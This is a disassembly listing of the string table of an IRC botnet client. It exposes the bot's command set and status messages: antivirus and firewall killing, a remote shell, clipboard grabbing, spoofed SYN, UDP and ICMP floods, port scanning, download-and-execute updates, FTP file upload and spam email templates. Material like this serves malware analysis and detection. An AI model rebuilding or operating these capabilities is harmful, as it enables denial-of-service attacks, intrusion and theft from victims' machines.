aMircV5_71K_mar db 'mIRC v5.71 K.Mardam-Bey',0 ; DATA XREF: .data:00424B2C�o
aMirc32V6_12K_m db 'mIRC32 v6.12 K.Mardam-Bey',0 ; DATA XREF: .data:00424B28�o
align 4
aMirc32V6_03K_m db 'mIRC32 v6.03 K.Mardam-Bey',0 ; DATA XREF: .data:00424B24�o
align 4
aMirc32V6_01K_m db 'mIRC32 v6.01 K.Mardam-Bey',0 ; DATA XREF: .data:00424B20�o
align 4
aMirc32V5_82K_m db 'mIRC32 v5.82 K.Mardam-Bey',0 ; DATA XREF: .data:00424B1C�o
align 10h
aMircV6_03Khale db 'mIRC v6.03 Khaled Mardam-Bey',0 ; DATA XREF: .data:00424B18�o
align 10h
aMircV6_12Khale db 'mIRC v6.12 Khaled Mardam-Bey',0 ; DATA XREF: .data:off_424B14�o
align 10h
a@fofo db '*@fofo',0 ; DATA XREF: .data:off_424B10�o
align 4
; char aIdentdFailedTo[]
aIdentdFailedTo db '[IDENTD]: Failed to start server, error: <%d>.',0
; DATA XREF: WinMain(x,x,x,x)+4DB�o
; sub_409557+182F�o
align 4
; char aIdentdServerRu[]
aIdentdServerRu db '[IDENTD]: Server running on Port: 113.',0
; DATA XREF: WinMain(x,x,x,x)+490�o
; sub_409557+17E2�o
align 10h
; char aSecureFailedTo[]
aSecureFailedTo db '[SECURE]: Failed to start registry thread, error: <%d>.',0
; DATA XREF: WinMain(x,x,x,x)+463�o
aSecureRegistry db '[SECURE]: Registry monitor active.',0 ; DATA XREF: WinMain(x,x,x,x)+410�o
align 4
; char aProcsFailedToS[]
aProcsFailedToS db '[PROCS]: Failed to start AV/FW killer thread, error: <%d>.',0
; DATA XREF: WinMain(x,x,x,x)+3F0�o
align 4
; char aProcsAvFwKille[]
aProcsAvFwKille db '[PROCS]: AV/FW Killer active.',0 ; DATA XREF: WinMain(x,x,x,x)+39F�o
align 4
; char aMainBotStarted[]
aMainBotStarted db '[MAIN]: Bot started.',0 ; DATA XREF: WinMain(x,x,x,x)+364�o
align 10h
; char aSDS[]
aSDS db '%s %d "%s"',0 ; DATA XREF: WinMain(x,x,x,x)+28F�o
align 4
; char aSS_0[]
aSS_0 db '%s\%s',0 ; DATA XREF: WinMain(x,x,x,x)+189�o
align 4
; char aMainConnectedT[]
aMainConnectedT db '[MAIN]: Connected to %s.',0 ; DATA XREF: sub_409277+F2�o
align 10h
; char aNickSUserS00S[]
aNickSUserS00S db 'NICK %s',0Dh,0Ah ; DATA XREF: sub_4093DF+62�o
db 'USER %s 0 0 :%s',0Dh,0Ah,0
align 4
; char aPassS[]
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_4093DF+35�o
align 4
; char aModeSS[]
aModeSS db 'MODE %s %s',0Dh,0Ah,0 ; DATA XREF: sub_409557+542D�o
align 4
; char aUserhostS[]
aUserhostS db 'USERHOST %s',0Dh,0Ah,0 ; DATA XREF: sub_409557+5418�o
align 4
; char aMainUserSLog_1[]
aMainUserSLog_1 db '[MAIN]: User: %s logged in.',0 ; DATA XREF: sub_409557+5404�o
aMainPasswordAc db '[MAIN]: Password accepted.',0 ; DATA XREF: sub_409557+53E7�o
align 10h
aMainFailedHost db '[MAIN]: *Failed host auth by: (%s!%s).',0 ; DATA XREF: sub_409557+5389�o
align 4
; char aNoticeSHostAut[]
aNoticeSHostAut db 'NOTICE %s :Host Auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_409557+5366�o
align 10h
; char aMainFailedPass[]
aMainFailedPass db '[MAIN]: *Failed pass auth by: (%s!%s).',0 ; DATA XREF: sub_409557+5319�o
align 4
; char aNoticeSYourAtt[]
aNoticeSYourAtt db 'NOTICE %s :Your attempt has been logged.',0Dh,0Ah,0
; DATA XREF: sub_409557+530A�o
; sub_409557+537A�o
align 4
; char aNoticeSPassAut[]
aNoticeSPassAut db 'NOTICE %s :Pass auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_409557+52F6�o
align 4
; char asc_42569C[]
asc_42569C: ; DATA XREF: sub_409557+52C6�o
unicode 0, <~>,0
; char aMainRandomNick[]
aMainRandomNick db '[MAIN]: Random nick change: %s',0 ; DATA XREF: sub_409557+5275�o
align 10h
aMainInvalidLog db '[MAIN]: Invalid login slot number: %d.',0 ; DATA XREF: sub_409557+51BB�o
align 4
aMainNoUserLogg db '[MAIN]: No user logged in at slot: %d.',0 ; DATA XREF: sub_409557+51B3�o
align 10h
aMainS db '[MAIN]: %s',0 ; DATA XREF: sub_409557+515E�o
align 4
aSocks4FailedTo db '[SOCKS4]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_409557+514F�o
align 4
; char aSocks4ServerSt[]
aSocks4ServerSt db '[SOCKS4]: Server started on: %s:%d.',0 ; DATA XREF: sub_409557+50E0�o
; sub_4103F5+A8�o
aProc db '[PROC]',0 ; DATA XREF: sub_409557+5016�o
align 10h
aProcessList db 'Process list',0 ; DATA XREF: sub_409557+5011�o
align 10h
aMainReconnecti db '[MAIN]: Reconnecting.',0 ; DATA XREF: sub_409557+4FDE�o
align 4
; char aQuitReconnecti[]
aQuitReconnecti db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_409557:loc_40E528�o
align 10h
aMainDisconnect db '[MAIN]: Disconnecting.',0 ; DATA XREF: sub_409557+4FBC�o
align 4
; char aQuitDisconnect[]
aQuitDisconnect db 'QUIT :disconnecting',0Dh,0Ah,0 ; DATA XREF: sub_409557:loc_40E506�o
align 10h
; char aQuitS[]
aQuitS db 'QUIT :%s',0Dh,0Ah,0 ; DATA XREF: sub_409557+4F87�o
align 4
; char aMainStatusRead[]
aMainStatusRead db '[MAIN]: Status: Ready. Bot Uptime: %s.',0 ; DATA XREF: sub_409557+4F3B�o
align 4
; char aMainBotIdS_[]
aMainBotIdS_ db '[MAIN]: Bot ID: %s.',0 ; DATA XREF: sub_409557+4EFD�o
; char aThreadsFaile_0[]
aThreadsFaile_0 db '[THREADS]: Failed to start list thread, error: <%d>.',0
; DATA XREF: sub_409557+4ED2�o
align 10h
; char aThreadsListThr[]
aThreadsListThr db '[THREADS]: List threads.',0 ; DATA XREF: sub_409557+4E67�o
align 4
; char aSub[]
aSub db 'sub',0 ; DATA XREF: sub_409557+4E41�o
aMainAliasList_ db '[MAIN]: Alias list.',0 ; DATA XREF: sub_409557+4DF2�o
aLogFailedToSta db '[LOG]: Failed to start listing thread, error: <%d>.',0
; DATA XREF: sub_409557+4DD7�o
; char aLogListingLog_[]
aLogListingLog_ db '[LOG]: Listing log.',0 ; DATA XREF: sub_409557+4D4A�o
aMainNetworkInf db '[MAIN]: Network Info.',0 ; DATA XREF: sub_409557+4CC6�o
align 4
aMainSystemInfo db '[MAIN]: System Info.',0 ; DATA XREF: sub_409557+4C97�o
align 4
aMainRemovingBo db '[MAIN]: Removing Bot.',0 ; DATA XREF: sub_409557+4C42�o
align 4
; char aProcsFailedT_0[]
aProcsFailedT_0 db '[PROCS]: Failed to start listing thread, error: <%d>.',0
; DATA XREF: sub_409557+4C26�o
align 4
; char aProcsProccessL[]
aProcsProccessL db '[PROCS]: Proccess list.',0 ; DATA XREF: sub_409557+4BB1�o
; char aFull[]
aFull db 'full',0 ; DATA XREF: sub_409557+4B91�o
align 4
aProcAlreadyRun db '[PROC]: Already running.',0 ; DATA XREF: sub_409557+4B2F�o
align 4
; char aMainUptimeS_[]
aMainUptimeS_ db '[MAIN]: Uptime: %s.',0 ; DATA XREF: sub_409557+4AE1�o
; char aCmdRemoteShe_0[]
aCmdRemoteShe_0 db '[CMD]: Remote shell ready.',0 ; DATA XREF: sub_409557:loc_40DF9B�o
align 4
aCmdCouldnTOpen db '[CMD]: Couldn',27h,'t open remote shell.',0
; DATA XREF: sub_409557+4A3D�o
align 4
aCmdRemoteShell db '[CMD]: Remote shell already running.',0 ; DATA XREF: sub_409557+4A21�o
align 4
aMainGetClipboa db '[MAIN]: Get Clipboard.',0 ; DATA XREF: sub_409557+4A0B�o
align 4
aClipboardData db '-[Clipboard Data]-',0 ; DATA XREF: sub_409557+49DD�o
align 10h
aFlushdnsFail_1 db '[FLUSHDNS]: Failed to flush ARP cache.',0
; DATA XREF: sub_409557:loc_40DF24�o
align 4
; char aFlushdnsArpC_0[]
aFlushdnsArpC_0 db '[FLUSHDNS]: ARP cache flushed.',0 ; DATA XREF: sub_409557+49B2�o
align 4
aFlushdnsFail_0 db '[FLUSHDNS]: Failed to load dnsapi.dll.',0
; DATA XREF: sub_409557:loc_40DEF9�o
align 10h
aFlushdnsFailed db '[FLUSHDNS]: Failed to flush DNS cache.',0
; DATA XREF: sub_409557:loc_40DEF2�o
align 4
aFlushdnsDnsCac db '[FLUSHDNS]: DNS cache flushed.',0 ; DATA XREF: sub_409557+4994�o
align 4
; char aRlogindFailedT[]
aRlogindFailedT db '[RLOGIND]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_409557+4916�o
align 10h
; char aRlogindServerL[]
aRlogindServerL db '[RLOGIND]: Server listening on IP: %s:%d, Username: %s.',0
; DATA XREF: sub_409557+48AB�o
aHttpdFailedT_1 db '[HTTPD]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_409557+47E2�o
align 10h
aTftpFailedTo_0 db '[TFTP]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_409557+466C�o
aTftpAlreadyRun db '[TFTP]: Already running.',0 ; DATA XREF: sub_409557+4544�o
align 10h
aScanFailedTo_2 db '[SCAN]: Failed to start scan, port is invalid.',0
; DATA XREF: sub_409557:loc_40DA85�o
align 10h
aMainNickChange db '[MAIN]: Nick changed to: ',27h,'%s',27h,'.',0
; DATA XREF: sub_409557+4233�o
align 10h
aMainJoinedCh_0 db '[MAIN]: Joined channel: ',27h,'%s',27h,'.',0
; DATA XREF: sub_409557+421A�o
align 10h
aMainPartedChan db '[MAIN]: Parted channel: ',27h,'%s',27h,'.',0
; DATA XREF: sub_409557+41FA�o
align 10h
aMainIrcRawS_ db '[MAIN]: IRC Raw: %s.',0 ; DATA XREF: sub_409557+41E1�o
align 4
; char aThreadsFailedT[]
aThreadsFailedT db '[THREADS]: Failed to kill thread: %s.',0
; DATA XREF: sub_409557:loc_40D6BA�o
align 10h
aThreadsKilledT db '[THREADS]: Killed thread: %s.',0 ; DATA XREF: sub_409557+415C�o
align 10h
aThreadsNoActiv db '[THREADS]: No active threads found.',0
; DATA XREF: sub_409557:loc_40D66D�o
aThreadsStopped db '[THREADS]: Stopped: %d thread(s).',0 ; DATA XREF: sub_409557+410C�o
align 4
; char aAll[]
aAll db 'all',0 ; DATA XREF: sub_409557+40F2�o
; char aQuitLater[]
aQuitLater db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_409557+406B�o
; sub_409557:loc_40E4F0�o
align 4
aMainPrefixChan db '[MAIN]: Prefix changed to: ',27h,'%c',27h,'.',0
; DATA XREF: sub_409557+3FF3�o
align 10h
aShellCouldnTOp db '[SHELL]: Couldn',27h,'t open file: %s',0
; DATA XREF: sub_409557:loc_40D535�o
aShellFileOpene db '[SHELL]: File opened: %s',0 ; DATA XREF: sub_409557+3FD4�o
align 4
; char aMainServerChan[]
aMainServerChan db '[MAIN]: Server changed to: ',27h,'%s',27h,'.',0
; DATA XREF: sub_409557+3FAB�o
align 10h
; char aDnsCouldnTReso[]
aDnsCouldnTReso db '[DNS]: Couldn',27h,'t resolve hostname.',0
; DATA XREF: sub_409557:loc_40D4D8�o
align 4
; char aDnsLookupSS_[]
aDnsLookupSS_ db '[DNS]: Lookup: %s -> %s.',0 ; DATA XREF: sub_409557+3F53�o
align 10h
aProcFailedTo_0 db '[PROC]: Failed to terminate process: %s',0
; DATA XREF: sub_409557:loc_40D476�o
aProcProcessK_0 db '[PROC]: Process killed: %s',0 ; DATA XREF: sub_409557+3F15�o
align 4
; char aProcFailedToTe[]
aProcFailedToTe db '[PROC]: Failed to terminate process ID: %s',0
; DATA XREF: sub_409557:loc_40D416�o
align 10h
aProcProcessKil db '[PROC]: Process killed ID: %s',0 ; DATA XREF: sub_409557+3EB8�o
align 10h
aFileDeletedS_ db '[FILE]: Deleted ',27h,'%s',27h,'.',0 ; DATA XREF: sub_409557+3E77�o
align 4
aFileListS db '[FILE]: List: %s',0 ; DATA XREF: sub_409557+3E61�o
align 4
aMircCommandSen db '[mIRC]: Command sent.',0 ; DATA XREF: sub_409557:loc_40D39D�o
align 4
aMircClientNotO db '[mIRC]: Client not open.',0 ; DATA XREF: sub_409557+3E3C�o
align 10h
aCmdCommandsS db '[CMD]: Commands: %s',0 ; DATA XREF: sub_409557+3E0B�o
aCmdErrorSendin db '[CMD]: Error sending to remote shell.',0 ; DATA XREF: sub_409557+3E00�o
align 4
aMainReadFileFa db '[MAIN]: Read file failed: %s',0 ; DATA XREF: sub_409557+3DC0�o
align 4
; char aMainReadFileCo[]
aMainReadFileCo db '[MAIN]: Read file complete: %s',0 ; DATA XREF: sub_409557+3DAC�o
align 4
; char aMainGethostS_[]
aMainGethostS_ db '[MAIN]: Gethost: %s.',0 ; DATA XREF: sub_409557+3D27�o
align 4
; char aMainUnableToEx[]
aMainUnableToEx db '[MAIN]: Unable to extract Gethost command.',0
; DATA XREF: sub_409557+3CEC�o
align 10h
; char aMainGethostSCo[]
aMainGethostSCo db '[MAIN]: Gethost: %s, Command: %s',0 ; DATA XREF: sub_409557+3CD0�o
align 4
; char aMainAliasAdded[]
aMainAliasAdded db '[MAIN]: Alias added: %s.',0 ; DATA XREF: sub_409557+3C4E�o
align 10h
; char aMainPrivmsgSS_[]
aMainPrivmsgSS_ db '[MAIN]: Privmsg: %s: %s.',0 ; DATA XREF: sub_409557+3C13�o
align 4
; char aMainActionSS_[]
aMainActionSS_ db '[MAIN]: Action: %s: %s.',0 ; DATA XREF: sub_409557+3BBD�o
aMainCycle_ db '[MAIN]: Cycle.',0 ; DATA XREF: sub_409557+3B55�o
align 4
; char aPartS_0[]
aPartS_0 db 'PART %s',0Dh,0Ah,0 ; DATA XREF: sub_409557+3B1B�o
; sub_409557+41EC�o
align 10h
; char aMainModeChange[]
aMainModeChange db '[MAIN]: Mode change: %s',0 ; DATA XREF: sub_409557+3AEC�o
; char aModeS_0[]
aModeS_0 db 'MODE %s',0Dh,0Ah,0 ; DATA XREF: sub_409557+3ADE�o
align 4
aCloneRawSS db '[CLONE]: Raw (%s): %s',0 ; DATA XREF: sub_409557+3AB5�o
align 4
aCloneModeSS db '[CLONE]: Mode (%s): %s',0 ; DATA XREF: sub_409557+3A4A�o
align 4
; char aModeS[]
aModeS db 'MODE %s',0 ; DATA XREF: sub_409557+39F5�o
; char aCloneNickSS[]
aCloneNickSS db '[CLONE]: Nick (%s): %s',0 ; DATA XREF: sub_409557+39C0�o
align 4
; char aNickS_0[]
aNickS_0 db 'NICK %s',0 ; DATA XREF: sub_409557+396A�o
; sub_409557+4035�o
; char aJoinSS_0[]
aJoinSS_0 db 'JOIN %s %s',0 ; DATA XREF: sub_409557+394B�o
align 4
; char aPartS[]
aPartS db 'PART %s',0 ; DATA XREF: sub_409557+38E1�o
aMainRepeatNotA db '[MAIN]: Repeat not allowed in command line: %s',0
; DATA XREF: sub_409557:loc_40CE25�o
align 10h
; char aMainRepeatS[]
aMainRepeatS db '[MAIN]: Repeat: %s',0 ; DATA XREF: sub_409557+3897�o
align 4
aMainDelay_ db '[MAIN]: Delay.',0 ; DATA XREF: sub_409557:loc_40CD55�o
align 4
; char aSSSS[]
aSSSS db '%s %s %s :%s',0 ; DATA XREF: sub_409557+37BE�o
; sub_409557+3871�o ...
align 4
; char aUpdateBotIdMus[]
aUpdateBotIdMus db '[UPDATE]: Bot ID must be different than current running process.',0
; DATA XREF: sub_409557:loc_40CC92�o
align 4
; char aUpdateFailedTo[]
aUpdateFailedTo db '[UPDATE]: Failed to start download thread, error: <%d>.',0
; DATA XREF: sub_409557+3725�o
; char aUpdateDownload[]
aUpdateDownload db '[UPDATE]: Downloading update from: %s.',0 ; DATA XREF: sub_409557+36BA�o
align 4
; char aSS_exe[]
aSS_exe db '%s%s.exe',0 ; DATA XREF: sub_409557+3614�o
align 4
aExecCommandsS db '[EXEC]: Commands: %s',0 ; DATA XREF: sub_409557+35B5�o
align 4
aExecCouldnTExe db '[EXEC]: Couldn',27h,'t execute file.',0 ; DATA XREF: sub_409557+35AA�o
align 4
aFile db '[FILE]:',0 ; DATA XREF: sub_409557:loc_40CA2C�o
; sub_409557:loc_40D3D5�o
; char aFileRenameSToS[]
aFileRenameSToS db '[FILE]: Rename: ',27h,'%s',27h,' to: ',27h,'%s',27h,'.',0
; DATA XREF: sub_409557+34C0�o
align 4
aIcmpInvalidFlo db '[ICMP]: Invalid flood time must be greater than 0.',0
; DATA XREF: sub_409557:loc_40C9F5�o
align 4
aIcmpFailedToSt db '[ICMP]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_409557+3494�o
align 4
; char aIcmpFloodingSF[]
aIcmpFloodingSF db '[ICMP]: Flooding: (%s) for %s seconds.',0 ; DATA XREF: sub_409557+341A�o
align 4
aClonesFailedTo db '[CLONES]: Failed to start clone thread, error: <%d>.',0
; DATA XREF: sub_409557+33A3�o
align 4
; char aClonesCreatedO[]
aClonesCreatedO db '[CLONES]: Created on %s:%d, in channel %s.',0
; DATA XREF: sub_409557+3334�o
align 4
; char aDdosFailedToSt[]
aDdosFailedToSt db '[DDoS]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_409557+32AC�o
align 4
; char aDdosFloodingSS[]
aDdosFloodingSS db '[DDoS]: Flooding: (%s:%s) for %s seconds.',0
; DATA XREF: sub_409557+3234�o
align 4
; char aSynFailedToSta[]
aSynFailedToSta db '[SYN]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_409557+319F�o
align 4
; char aSynFloodingSSF[]
aSynFloodingSSF db '[SYN]: Flooding: (%s:%s) for %s seconds.',0
; DATA XREF: sub_409557+3125�o
align 4
aDownloadFailed db '[DOWNLOAD]: Failed to start transfer thread, error: <%d>.',0
; DATA XREF: sub_409557+30B5�o
align 4
; char aDownloadDown_1[]
aDownloadDown_1 db '[DOWNLOAD]: Downloading URL: %s to: %s.',0 ; DATA XREF: sub_409557+3046�o
aRedirectFailed db '[REDIRECT]: Failed to start redirection thread, error: <%d>.',0
; DATA XREF: sub_409557+2F77�o
align 4
; char aRedirectTcpRed[]
aRedirectTcpRed db '[REDIRECT]: TCP redirect created from: %s:%d to: %s:%d.',0
; DATA XREF: sub_409557+2F08�o
; char aScanPortScanSt[]
aScanPortScanSt db '[SCAN]: Port scan started: %s:%d with delay: %d(ms).',0
; DATA XREF: sub_409557+2E0E�o
align 4
aSSS_2 db '[%s] <%s> %s',0 ; DATA XREF: sub_409557+2D8A�o
align 4
; char aSSS_1[]
aSSS_1 db '[%s] * %s %s',0 ; DATA XREF: sub_409557+2C8D�o
align 4
; char dword_42653C
dword_42653C dd 54434101h, 204E4F49h, 17325h ; DATA XREF: sub_409557+2BFF�o
; sub_409557+3B9E�o
; char aScanFailedTo_1[]
aScanFailedTo_1 db '[SCAN]: Failed to start scan thread, error: <%d>.',0
; DATA XREF: sub_409557+2BA0�o
; sub_409557+2E7D�o ...
align 4
; char aScanSPortScanS[]
aScanSPortScanS db '[SCAN]: %s Port Scan started on %s:%d with a delay of %d seconds '
; DATA XREF: sub_409557+2B31�o
; sub_409557+446F�o
db 'for %d minutes using %d threads.',0
align 10h
aSequential db 'Sequential',0 ; DATA XREF: sub_409557+2B06�o
; sub_409557+4444�o
align 4
aRandom_0 db 'Random',0 ; DATA XREF: sub_409557+2AFF�o
; sub_409557+443D�o
align 4
aScanFailedTo_0 db '[SCAN]: Failed to start scan, no IP specified.',0
; DATA XREF: sub_409557+29C1�o
align 4
; char aScanAlreadyDSc[]
aScanAlreadyDSc db '[SCAN]: Already %d scanning threads. Too many specified.',0
; DATA XREF: sub_409557+2878�o
; sub_409557+428C�o
align 10h
aUdpFailedToSta db '[UDP]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_409557+2847�o
align 4
; char aUdpSendingDPac[]
aUdpSendingDPac db '[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).'
; DATA XREF: sub_409557+27D8�o
db 0
align 4
; char aIcmp_dllNotAva[]
aIcmp_dllNotAva db 'ICMP.dll not available',0 ; DATA XREF: sub_409557+2711�o
align 10h
aPingFailedToSt db '[PING]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_409557+26FC�o
align 4
; char aPingSendingDPi[]
aPingSendingDPi db '[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).'
; DATA XREF: sub_409557+2691�o
db 0
align 4
aTcpInvalidFl_0 db '[TCP]: Invalid flood time must be greater than 0.',0
; DATA XREF: sub_409557:loc_40BB4B�o
align 4
aTcpFailedToSta db '[TCP]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_409557+25EA�o
align 10h
; char aTcpSSFloodingS[]
aTcpSSFloodingS db '[TCP]: %s %s flooding: (%s:%s) for %s seconds.',0
; DATA XREF: sub_409557+2570�o
align 10h
aNormal db 'Normal',0 ; DATA XREF: sub_409557+2560�o
align 4
aSpoofed db 'Spoofed',0 ; DATA XREF: sub_409557+2559�o
aTcpInvalidFloo db '[TCP]: Invalid flood type specified.',0 ; DATA XREF: sub_409557+24C4�o
align 4
; char aRandom[]
aRandom db 'random',0 ; DATA XREF: sub_409557+24B4�o
; sub_4111FF+312�o
align 10h
; char aAck[]
aAck db 'ack',0 ; DATA XREF: sub_409557+249D�o
; sub_4111FF+2F2�o
; char aFtpUploading_0[]
aFtpUploading_0 db '[FTP]: Uploading file: %s to: %s failed.',0
; DATA XREF: sub_409557:loc_40B933�o
align 10h
aFtpUploadingFi db '[FTP]: Uploading file: %s to: %s',0 ; DATA XREF: sub_409557+23D5�o
align 4
aFtp_exe db 'ftp.exe',0 ; DATA XREF: sub_409557+23BE�o
; char aSS_4[]
aSS_4 db '-s:%s',0 ; DATA XREF: sub_409557+23A7�o
align 4
; char aOpenSSSSPutSBy[]
aOpenSSSSPutSBy db 'open %s',0Dh,0Ah ; DATA XREF: sub_409557+2387�o
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'put %s',0Dh,0Ah
db 'bye',0Dh,0Ah,0
align 4
; char aAb[]
aAb db 'ab',0 ; DATA XREF: sub_409557+2363�o
align 4
; char aSIII_dll[]
aSIII_dll db '%s\%i%i%i.dll',0 ; DATA XREF: sub_409557+2352�o
align 4
; char aFtpFileNotFoun[]
aFtpFileNotFoun db '[FTP]: File not found: %s.',0 ; DATA XREF: sub_409557+22CC�o
align 4
; char aUpload[]
aUpload db 'upload',0 ; DATA XREF: sub_409557+22A9�o
align 10h
; char aHcon[]
aHcon db 'hcon',0 ; DATA XREF: sub_409557+2286�o
align 4
; char aHttpcon[]
aHttpcon db 'httpcon',0 ; DATA XREF: sub_409557+226F�o
; char aEmailMessageSe[]
aEmailMessageSe db '[EMAIL]: Message sent to %s.',0 ; DATA XREF: sub_409557+222E�o
align 10h
; char aHeloRndnickMai[]
aHeloRndnickMai db 'helo $rndnick',0Ah ; DATA XREF: sub_409557+21BA�o
db 'mail from: <%s>',0Ah
db 'rcpt to: <%s>',0Ah
db 'data',0Ah
db 'subject: %s',0Ah
db 'from: %s',0Ah
db '%s',0Ah
db '.',0Ah,0
; char a_[]
a_: ; DATA XREF: sub_409557+211E�o
unicode 0, <_>,0
; char aEmail[]
aEmail db 'email',0 ; DATA XREF: sub_409557+20CF�o
align 4
; char aTcp[]
aTcp db 'tcp',0 ; DATA XREF: sub_409557+20B8�o
; char aTcpflood[]
aTcpflood db 'tcpflood',0 ; DATA XREF: sub_409557+20A1�o
align 4
; char aP[]
aP: ; DATA XREF: sub_409557+208A�o
unicode 0, <p>,0
; char aPing_1[]
aPing_1 db 'ping',0 ; DATA XREF: sub_409557+2073�o
align 4
; char aPingflood[]
aPingflood db 'pingflood',0 ; DATA XREF: sub_409557+205C�o
align 10h
; char aU[]
aU: ; DATA XREF: sub_409557+2045�o
unicode 0, <u>,0
; char aUdp[]
aUdp db 'udp',0 ; DATA XREF: sub_409557+202E�o
; char aUdpflood[]
aUdpflood db 'udpflood',0 ; DATA XREF: sub_409557+2017�o
align 4
; char aF0f0f0[]
aF0f0f0 db 'f0f0f0',0 ; DATA XREF: sub_409557+2000�o
align 4
; char aFofofo[]
aFofofo db 'fofofo',0 ; DATA XREF: sub_409557+1FE9�o
align 4
; char aC_a[]
aC_a db 'c_a',0 ; DATA XREF: sub_409557+1FC0�o
; char aC_action[]
aC_action db 'c_action',0 ; DATA XREF: sub_409557+1FA9�o
align 4
; char aC_pm[]
aC_pm db 'c_pm',0 ; DATA XREF: sub_409557+1F92�o
align 4
; char aC_privmsg[]
aC_privmsg db 'c_privmsg',0 ; DATA XREF: sub_409557+1F7B�o
align 4
; char aSc[]
aSc db 'sc',0 ; DATA XREF: sub_409557+1F64�o
align 4
; char aScan_1[]
aScan_1 db 'scan',0 ; DATA XREF: sub_409557+1F4D�o
align 4
; char aRd[]
aRd db 'rd',0 ; DATA XREF: sub_409557+1F36�o
align 4
; char aRedirect_0[]
aRedirect_0 db 'redirect',0 ; DATA XREF: sub_409557+1F1F�o
align 4
; char aFalehdownl2[]
aFalehdownl2 db 'falehdownl2',0 ; DATA XREF: sub_409557+1F08�o
; char aFalehdownl[]
aFalehdownl db 'falehdownl',0 ; DATA XREF: sub_409557+1EF1�o
align 4
; char aSyn_0[]
aSyn_0 db 'syn',0 ; DATA XREF: sub_409557+1EDA�o
; sub_409557+2485�o ...
; char aSynflood[]
aSynflood db 'synflood',0 ; DATA XREF: sub_409557+1EC3�o
align 4
; char aC[]
aC: ; DATA XREF: sub_409557+1E67�o
unicode 0, <c>,0
; char aClone_0[]
aClone_0 db 'clone',0 ; DATA XREF: sub_409557+1E50�o
align 4
; char aIcmp[]
aIcmp db 'icmp',0 ; DATA XREF: sub_409557+1E27�o
align 10h
; char aIcmpflood[]
aIcmpflood db 'icmpflood',0 ; DATA XREF: sub_409557+1E10�o
align 4
; char aMv[]
aMv db 'mv',0 ; DATA XREF: sub_409557+1DF9�o
align 10h
; char aRename[]
aRename db 'rename',0 ; DATA XREF: sub_409557+1DE2�o
align 4
; char aE[]
aE: ; DATA XREF: sub_409557+1DCB�o
unicode 0, <e>,0
; char aExecute[]
aExecute db 'execute',0 ; DATA XREF: sub_409557+1DB4�o
; char aUfalehupdp[]
aUfalehupdp db 'ufalehupdp',0 ; DATA XREF: sub_409557+1D9D�o
align 10h
; char aFalehupd[]
aFalehupd db 'falehupd',0 ; DATA XREF: sub_409557+1D86�o
align 4
; char aDe[]
aDe db 'de',0 ; DATA XREF: sub_409557+1D6F�o
align 10h
; char aDelay[]
aDelay db 'delay',0 ; DATA XREF: sub_409557+1D58�o
align 4
; char aRp[]
aRp db 'rp',0 ; DATA XREF: sub_409557+1D41�o
align 4
; char aRepeat[]
aRepeat db 'repeat',0 ; DATA XREF: sub_409557+1D2A�o
; sub_409557+3846�o
align 4
; char aC_p[]
aC_p db 'c_p',0 ; DATA XREF: sub_409557+1D13�o
; char aC_part[]
aC_part db 'c_part',0 ; DATA XREF: sub_409557+1CFC�o
align 10h
; char aC_j[]
aC_j db 'c_j',0 ; DATA XREF: sub_409557+1CE5�o
; char aC_join[]
aC_join db 'c_join',0 ; DATA XREF: sub_409557+1CCE�o
align 4
; char aC_n[]
aC_n db 'c_n',0 ; DATA XREF: sub_409557+1CB7�o
; char aC_nick[]
aC_nick db 'c_nick',0 ; DATA XREF: sub_409557+1CA0�o
align 4
; char aC_m[]
aC_m db 'c_m',0 ; DATA XREF: sub_409557+1C89�o
; char aC_mode[]
aC_mode db 'c_mode',0 ; DATA XREF: sub_409557+1C72�o
align 4
; char aC_r[]
aC_r db 'c_r',0 ; DATA XREF: sub_409557+1C5B�o
; char aC_raw[]
aC_raw db 'c_raw',0 ; DATA XREF: sub_409557+1C44�o
align 10h
; char aM_0[]
aM_0: ; DATA XREF: sub_409557+1C2D�o
unicode 0, <m>,0
; char aMode[]
aMode db 'mode',0 ; DATA XREF: sub_409557+1C16�o
align 4
; char aCy[]
aCy db 'cy',0 ; DATA XREF: sub_409557+1BFF�o
align 10h
; char aCycle[]
aCycle db 'cycle',0 ; DATA XREF: sub_409557+1BE8�o
align 4
; char aA_1[]
aA_1: ; DATA XREF: sub_409557+1BD1�o
unicode 0, <a>,0
; char aAction[]
aAction db 'action',0 ; DATA XREF: sub_409557+1BBA�o
align 4
; char aPm_0[]
aPm_0 db 'pm',0 ; DATA XREF: sub_409557+1BA3�o
align 4
; char aPrivmsg_0[]
aPrivmsg_0 db 'privmsg',0 ; DATA XREF: sub_409557+1B8C�o
; char aAa[]
aAa db 'aa',0 ; DATA XREF: sub_409557+1B75�o
align 4
; char aAddalias[]
aAddalias db 'addalias',0 ; DATA XREF: sub_409557+1B5E�o
align 10h
; char aGh[]
aGh db 'gh',0 ; DATA XREF: sub_409557+1B35�o
align 4
; char aGethost[]
aGethost db 'gethost',0 ; DATA XREF: sub_409557+1B1E�o
aNetCommandUnkn db '[NET]: Command unknown.',0 ; DATA XREF: sub_409557:loc_40B068�o
aNetNoMessageSp db '[NET]: No message specified.',0 ; DATA XREF: sub_409557:loc_40B05E�o
align 4
aNetUserListFai db '[NET]: User list failed.',0 ; DATA XREF: sub_409557:loc_40B010�o
align 10h
aNetUserListCom db '[NET]: User list completed.',0 ; DATA XREF: sub_409557+1AAF�o
aNetShareListFa db '[NET]: Share list failed.',0 ; DATA XREF: sub_409557:loc_40AF6E�o
align 4
